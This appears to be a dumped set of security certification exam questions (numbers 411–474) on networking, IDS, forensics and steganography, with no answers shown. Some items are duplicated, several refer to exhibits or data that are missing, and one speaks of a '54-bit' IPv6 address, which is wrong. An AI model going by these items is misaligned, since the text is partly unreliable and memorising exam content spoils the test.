Question411: Which of the following protocols is used to translate IP addresses to Ethernet addresses?

Question412: Which of the following OSI layers is responsible for protocol conversion, data encryption/decryption, and data compression?

Question413: You are the Administrator for a corporate network. You are concerned about denial of service attacks.
Which of the following would be the most help against Denial of Service (DOS) attacks?

Question414: You work as a Network Administrator for McRobert Inc. Your company has a Windows NT 4.0 TCP/IP- based network. You want to list the cache of NetBIOS names and IP addresses. Which of the following utilities will you use?

Question415: What netsh command should be run to enable IPv6 routing?
Each correct answer represents a part of the solution. Choose two.

Question416: You are concerned about outside attackers penetrating your network via your company Web server. You wish to place your Web server between two firewalls. One firewall between the Web server and the outside world. The other between the Web server and your network. What is this called?

Question417: What does a firewall check to prevent certain ports and applications from getting the packets into an Enterprise?

Question418: Andrew works as a System Administrator for NetPerfect Inc. All client computers on the network run on Mac OS X.
The Sales Manager of the company complains that his MacBook is not able to boot. Andrew wants to check the booting process. He suspects that an error persists in the bootloader of Mac OS X.
Which of the following is the default bootloader on Mac OS X that he should use to resolve the issue?

Question419: Which of the following is the default port used by Simple Mail Transfer Protocol (SMTP)?

Question420: Which of the following is used to hash the information in Netcat?

Question421: Which of the following tools performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs?

Question422: Victor wants to send an encrypted message to his friend. He is using certain steganography technique to accomplish this task. He takes a cover object and changes it accordingly to hide information. This secret information is recovered only when the algorithm compares the changed cover with the original cover.
Which of the following Steganography methods is Victor using to accomplish the task?

Question423: Which of the following applications cannot proactively detect anomalies related to a computer?

Question424: Which of the following is computed from an arbitrary block of digital data for the purpose of detecting accidental errors?

Question425: Trinity wants to send an email to her friend. She uses the MD5 generator to calculate cryptographic hash of her email to ensure the security and integrity of the email. MD5 generator, which Trinity is using operates in two steps:
Creates check file

Verifies the check file

Which of the following MD5 generators is Trinity using?

Question426: Which method would provide the highest level of protection for all data transmitted on the internal network only? (Click the Exhibit button on the toolbar to see the case study.)

Question427: Sandra, an expert computer user, hears five beeps while booting her computer that has AMI BIOS; and after that her computer stops responding. Sandra knows that during booting process POST produces different beep codes for different types of errors. Which of the following errors refers to this POST beep code?

Question428: You work as a Security Professional for PassGuide Inc. The company has a Linux-based network. You want to analyze the network traffic with Snort. You run the following command:
snort -v -i eth 0
Which of the following information will you get using the above command?
Each correct answer represents a complete solution. Choose all that apply.

Question429: Which of the following commands displays the IPX routing table entries?

Question430: Which of the following firewalls inspects the actual contents of packets?

Question431: You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause?

Question432: You are the Network Administrator for a large corporate network. You want to monitor all network traffic on your local network for suspicious activities and receive a notification when a possible attack is in process.
Which of the following actions will you take for this?

Question433: Which of the following wireless security features provides the best wireless security mechanism?

Question434: You work as a Network Administrator for McRobert Inc. Your company has a TCP/IP-based network.
You want to know the statistics of each protocol installed on your computer. Which of the following commands will you use?

Question435: ________ is a command-line tool that can check the DNS registration of a domain controller.

Question436: You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate the DoS attack on a computer network of SecureEnet Inc. Which of the following methods will you perform to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.

Question437: Which of the following utilities provides information as per the format given below?

Question438: What is the maximum size of an IP datagram for Ethernet?

Question439: Which of the following tables is formed by NTFS file system to keep the track of files, to store metadata, and their location?

Question440: Which of the following distributes incorrect IP address to divert the traffic?

Question441: Which of the following is an exact duplicate of computer's hard drive?

Question442: With reference to the given case study, one of the security goals requires to configure a secure connection between the Boston distribution center and the headquarters. You want to implement IP filter to fulfill the security requirements. How should you implement IP filters at the headquarters?
(Click the Exhibit button on the toolbar to see the case study.)

Question443: You work as a Network Administrator for McNeil Inc. The company's Windows 2000-based network is configured with Internet Security and Acceleration (ISA) Server 2000. You want to configure intrusion detection on the server. You find that the different types of attacks on the Intrusion Detection tab page of the IP Packet Filters Properties dialog box are disabled. What is the most likely cause?

Question444: John works as a Network Administrator for DigiNet Inc. He wants to investigate failed logon attempts to a network. He uses Log Parser to detail out the failed logons over a specific time frame. He uses the following commands and query to list all failed logons on a specific date:
logparser.exe file:FailedLogons.sql -i:EVT -o:datagrid
SELECT
timegenerated AS LogonTime,
extract_token(strings, 0, '|') AS UserName
FROM Security
WHERE EventID IN (529;
530;
531;
532;
533;
534;
535;
537;
539)
AND to_string(timegenerated,'yyyy-MM-dd HH:mm:ss') like '2004-09%'
After investigation, John concludes that two logon attempts were made by using an expired account.
Which of the following EventID refers to this failed logon?

Question445: Which of the following ports is used by NTP for communication?

Question446: Which of the following can be applied as countermeasures against DDoS attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question447: Which of the following monitors program activities and modifies malicious activities on a system?

Question448: Which of the following tools is used to collect volatile data over a network?

Question449: Which of the following is an automated vulnerability assessment tool?

Question450: Which of the following tools is used to store the contents of a TDB (Trivial Database) file to the standard output when debugging problems with TDB files?

Question451: Which of the following is the ability of a hacker to determine the nature of the network?

Question452: You work as a Network Administrator for McNeil Inc. The company has a TCP/IP-based network.
You are configuring an Internet connection for your company. Your Internet service provider (ISP) has a UNIX-based server. Which of the following utilities will enable you to access the UNIX server, using a text- based connection?

Question453: In which of the following IDS evasion techniques does an attacker deliver data in multiple small sized packets, which makes it very difficult for an IDS to detect the attack signatures of such attacks?

Question454: Which of the following can be applied as countermeasures against DDoS attacks?
Each correct answer represents a complete solution. Choose all that apply.

Question455: Which of the following types of firewall functions at the Session layer of OSI model?

Question456: You work as a Network Administrator for Tech2tech Inc. You have configured a network-based IDS for your company.
You have physically installed sensors at all key positions throughout the network such that they all report to the command console.
What will be the key functions of the sensors in such a physical layout?
Each correct answer represents a complete solution. Choose all that apply.

Question457: Which of the following password cracking attacks is implemented by calculating all the possible hashes for a set of characters?

Question458: Which of the following DOS commands is used to configure network protocols?

Question459: Which of the following UDP ports are used by the Simple Network Management Protocol (SNMP)?
Each correct answer represents a complete solution. Choose two.

Question460: The promiscuous mode is a configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just packets addressed to it. Which of the following tools works by placing the host system network card into the promiscuous mode?

Question461: Which of the following activities will you use to retrieve user names, and info on groups, shares, and services of networked computers?

Question462: Which of the following is used to detect the bad sectors in a hard disk under Linux environment?

Question463: Which of the following can be monitored by using the host intrusion detection system (HIDS)?
Each correct answer represents a complete solution. Choose two.

Question464: Which of the following is a checksum algorithm?

Question465: Which of the following command-line utilities is used to show the state of current TCP/IP connections?

Question466: Mark works as a Network Security Administrator for BlueWells Inc. The company has a Windowsbased network. Mark is giving a presentation on Network security threats to the newly recruited employees of the company. His presentation is about the External threats that the company recently faced in the past. Which of the following statements are true about external threats?
Each correct answer represents a complete solution. Choose three.

Question467: You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate Cross- Site Scripting attack on your company's Website. Which of the following methods of investigation can you use to accomplish the task?
Each correct answer represents a complete solution. Choose all that apply.

Question468: Which of the following commands used in Linux to create bit-stream images?

Question469: Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:
1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.
2. Reducing noise by adjusting color and averaging pixel value.
3. Sharpening, Rotating, Resampling, and Softening the image.
Which of the following Steganography attacks is Victor using?

Question470: You work as a network administrator for BlueWell Inc. You have to convert your 48-bit host address (MAC address) to an IPv6 54-bit address. Using the IEEE-EUI-64 conversion process, how do you convert the
48-bit host address (MAC address) to an IPv6 54-bit address?

Question471: Adam, a malicious hacker is running a scan. Statistics of the scan is as follows:

Which of the following types of port scan is Adam running?

Question472: Which of the following DNS resource records is used to resolve a host name to an IPv6 address?

Question473: Which of the following tools is described below?
It is a set of tools that are used for sniffing passwords, e-mail, and HTTP traffic. Some of its tools include arpredirect, macof, tcpkill, tcpnice, filesnarf, and mailsnarf. It is highly effective for sniffing both switched and shared networks. It uses the arpredirect and macof tools for switching across switched networks. It can also be used to capture authentication information for FTP, telnet, SMTP, HTTP, POP, NNTP, IMAP, etc.

Question474: Maria works as the Chief Security Officer for passguide Inc. She wants to send secret messages to the CEO of the company. To secure these messages, she uses a technique of hiding a secret message within an ordinary message. The technique provides 'security through obscurity'. What technique is Maria using?